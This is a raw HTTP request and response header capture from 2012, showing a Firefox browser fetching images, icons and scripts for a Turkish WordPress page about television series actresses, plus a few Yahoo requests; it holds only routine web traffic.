Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/stumbleupon.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;531-4f1d9ae5-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:41 GMT
Content-Length: 1329
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/myspace.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4f4-4f1d9ae4-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:40 GMT
Content-Length: 1268
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/yahoo.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4a4-4f1d9ae6-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:42 GMT
Content-Length: 1188
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/technorati.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;643-4f1d9ae5-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:41 GMT
Content-Length: 1603
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/reddit.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;682-4f1d9ae4-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:40 GMT
Content-Length: 1666
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/rss.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;59a-4f1d9ae5-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:41 GMT
Content-Length: 1434
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/themes/osman/images/comment-arrow.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;a7-4f19b706-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:38 GMT
Content-Length: 167
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/themes/osman/images/comment-bg.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;ab-4f19b706-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:38 GMT
Content-Length: 171
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/themes/osman/images/input-name.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4af-4f19b716-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:54 GMT
Content-Length: 1199
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/themes/osman/images/input-website.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;548-4f19b717-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:55 GMT
Content-Length: 1352
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/themes/osman/images/input-email.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;3be-4f19b716-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:54 GMT
Content-Length: 958
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/themes/osman/images/textarea-comment.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;69e-4f19b730-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:49:20 GMT
Content-Length: 1694
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/uploads/fahriye1.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;37b4a-4aa61d26-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:00:22 GMT
Content-Length: 228170
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/widget-title-bg.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;ec-4f19b73a-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:49:30 GMT
Content-Length: 236
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/themes/osman/images/black-button.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;152-4f19b705-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:37 GMT
Content-Length: 338
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/themes/osman/images/arrowup.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;45d-4f19b703-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:35 GMT
Content-Length: 1117
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/themes/osman/images/patterns/pattern6.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4548f-4f19b751-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:49:53 GMT
Content-Length: 283791
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/js/colorbox/images/controls.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/js/colorbox/colorbox.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4e1-4f19b760-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:08 GMT
Content-Length: 1249
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/themes/osman/js/colorbox/images/border.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/js/colorbox/colorbox.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;70-4f19b75f-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:07 GMT
Content-Length: 112
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/themes/osman/js/colorbox/images/loading_background.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/js/colorbox/colorbox.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;9d-4f19b761-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:09 GMT
Content-Length: 157
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/themes/osman/js/colorbox/images/loading.gif HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/js/colorbox/colorbox.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;24d3-4f19b760-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:08 GMT
Content-Length: 9427
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET / HTTP/1.1

Host: geo.yahoo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Wed, 14 Nov 2012 13:32:33 GMT
Set-Cookie: B=1d2v79p8a77bh&amp;b=3&amp;s=t7; expires=Sat, 15-Nov-2014 13:32:33 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Last-Modified: Thu, 02 Feb 2012 15:15:41 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Encoding: gzip
Cache-Control: private
GET /wp-content/uploads/tuba1.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;8047e-4aa61886-0&quot;
Last-Modified: Tue, 08 Sep 2009 08:40:38 GMT
Content-Length: 525438
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /a/i/yahoo.gif HTTP/1.1

Host: l.yimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://geo.yahoo.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 13 Nov 2012 06:56:11 GMT
Cache-Control: max-age=315360000
Expires: Fri, 11 Nov 2022 06:56:11 GMT
Last-Modified: Mon, 24 Sep 2012 20:00:06 GMT
Accept-Ranges: bytes
Content-Length: 908
Age: 110182
Connection: keep-alive
Via: http/1.1 l5.ycs.dcb.yahoo.com (ApacheTrafficServer/3.2.0)
Server: ATS/3.2.0
GET /a/i/s/bullet.gif HTTP/1.1

Host: l.yimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://geo.yahoo.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 13 Nov 2012 06:53:47 GMT
Cache-Control: max-age=315360000
Expires: Fri, 11 Nov 2022 06:53:47 GMT
Last-Modified: Wed, 05 Sep 2007 12:01:59 GMT
Accept-Ranges: bytes
Content-Length: 43
Age: 110326
Connection: keep-alive
Via: http/1.1 l3.ycs.dcb.yahoo.com (ApacheTrafficServer/3.2.0)
Server: ATS/3.2.0
GET /wp-content/plugins/lightbox/images/loading.gif HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;acf-49cbe943-0&quot;
Last-Modified: Thu, 26 Mar 2009 20:44:51 GMT
Content-Length: 2767
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /wp-content/plugins/lightbox/images/closelabel.gif HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 14 Nov 2012 13:32:32 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;3d3-49cbe941-0&quot;
Last-Modified: Thu, 26 Mar 2009 20:44:49 GMT
Content-Length: 979
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:32 GMT
GET /favicon.ico HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Wed, 14 Nov 2012 13:32:33 GMT
